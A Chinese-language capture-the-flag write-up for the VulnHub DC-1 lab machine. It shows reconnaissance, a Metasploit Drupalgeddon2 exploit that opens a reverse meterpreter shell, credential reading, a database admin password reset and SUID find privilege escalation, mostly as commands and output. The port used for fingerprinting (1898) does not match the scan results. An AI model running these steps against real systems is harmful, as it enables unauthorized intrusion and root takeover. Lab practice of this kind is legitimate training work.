背景概述:
下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/
本次靶机IP为
192.168.2.11
技术要点:
- drupal7漏洞利用
- SUID的find命令提权
1. 信息收集
1.1 扫描目标主机IP
使用arp-scan进行局域网扫描,使用命令arp-scan -l
,扫描结果如下:
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 192.168.2.253
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.2.2 ec:3c:bb:ae:b7:45 Huawei Device Co., Ltd.
192.168.2.11 00:0c:29:a7:2b:2f VMware, Inc.
根据MAC地址可知靶机的IP地址为192.168.2.11
。
1.2 扫描目标主机开放端口
使用nmap进行端口扫描,使用命令nmap -sS -Pn -p 1-65535 192.168.2.11
,扫描结果如下:
└─# nmap -sS -Pn -p 1-65535 192.168.2.11 //扫描开放端口
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 09:37 CST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 88.53% done; ETC: 09:37 (0:00:01 remaining)
Nmap scan report for 192.168.2.11
Host is up (0.00080s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
37297/tcp open unknown
MAC Address: 00:0C:29:A7:2B:2F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds
根据扫描结果得知,目标主机开放了22、80、111、37297端口。
1.3 指纹识别
-
使用御剑WEB指纹识别系统进行站点的指纹识别,添加站点为
http://192.168.2.11:1898
进行扫描,得出应用指纹为Drupal(水滴)
。
但是并未获得CMS的版本信息,因此我们可以使用CMSeek来进行版本信息的探测,使用命令
python3 cmseek.py -u 192.168.2.11:1898
,得出Drupal 7
。 -
使用httprint进行中间件探测,得出目标系统为
Apache/2.2.22 (Debian)
。
2. GetShell
搜集Drupal 7
的相关漏洞信息,发现存在CVE-2018-7600 DRUPAL 7.X 版本代码执行
,尝试使用msf进行攻击。
└─# msfdb run //运行msf
[+] Starting database
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v6.0.45-dev ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: When in a module, use back to go
back to the top level prompt
[*] Starting persistent handler(s)...
msf6 > search drupal //搜索drupal相关漏洞利用
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2 //使用相关漏洞利用
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options //查看参数选项
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path
>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.19 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.2.11
RHOSTS => 192.168.2.11 //设置目标主机IP
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 80
RPORT => 80 //设置目标主机端口
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run //开始攻击
[*] Started reverse TCP handler on 192.168.2.19:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.2.11
[*] Meterpreter session 1 opened (192.168.2.19:4444 -> 192.168.2.11:56933) at 2021-12-09 17:23:21 +0800
meterpreter > shell //进入shell界面
Process 3338 created.
Channel 0 created.
获得shell!
3. 提权
- 执行shell获取交互式命令,由于我们获取的shell并不是一个具有完整交互的shell,对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端。在获得shell界面输入命令
python -c 'import pty; pty.spawn("/bin/bash")'
。
python -c 'import pty;pty.spawn("/bin/bash")' //创建原生终端
www-data@DC-1:/var/www$
www-data@DC-1:/var/www$ whoami //查看当前权限
whoami
www-data
- 输入
ls
命令查看当前文件夹,发现存在flag1.txt
文件。
www-data@DC-1:/var/www$ ls //查看当前文件夹
ls
COPYRIGHT.txt MAINTAINERS.txt flag1.txt profiles web.config
INSTALL.mysql.txt README.txt includes robots.txt xmlrpc.php
INSTALL.pgsql.txt UPGRADE.txt index.php scripts
INSTALL.sqlite.txt abc install.php sites
INSTALL.txt authorize.php misc themes
LICENSE.txt cron.php modules update.php
www-data@DC-1:/var/www$ cat flag1.txt //查看flag1.txt文件
cat flag1.txt
Every good CMS needs a config file - and so do you.
flag1.txt
文件提示我们需要查看config配置文件。进入/var/www/sites/default
目录下,查看settings.php
,发现数据库账号为dbuser
和密码为R0ck3t
。
-
尝试更改数据库用户admin的密码。在数据库更新管理源密码,加载加密脚本生成密码的hash值
php /var/www/scripts/password-hash.sh password
,加密脚本位置在网站根目录下的scripts下,生成password的hash值进行替换,使用命令update drupaldb.users set pass =" $ S $DgNSiYzRbilwq18C5.D/pnvrvdoKncm5W xBG7AIDqwFNKDi0TJCL" where name=“admin”;
进行密码的替换。登录网站,输入账户名为admin
、密码为password
。根据flag3提示我们需要使用find
命令的-exec
参数进行提权。 -
利用SUID提权进行提权,发现find命令在调用时会临时升级为root用户,因此可以利用find命令进行提权。提权完成后,进入根目录查看最终的flag值。
www-data@DC-1:/var/www$ find / -user root -perm -4000 -print 2>/dev/null //查找SUID文件
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
www-data@DC-1:/var/www$ mkdir abc //创建一个文件夹用于使用find命令进行SUID提权
www-data@DC-1:/var/www$ find abc -exec '/bin/sh' \; //使用find命令进行提权
find abc -exec '/bin/sh' \;
# whoami //查看当前权限
whoami
root
# cd /root //进入到根目录
cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt //查看最终flag
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey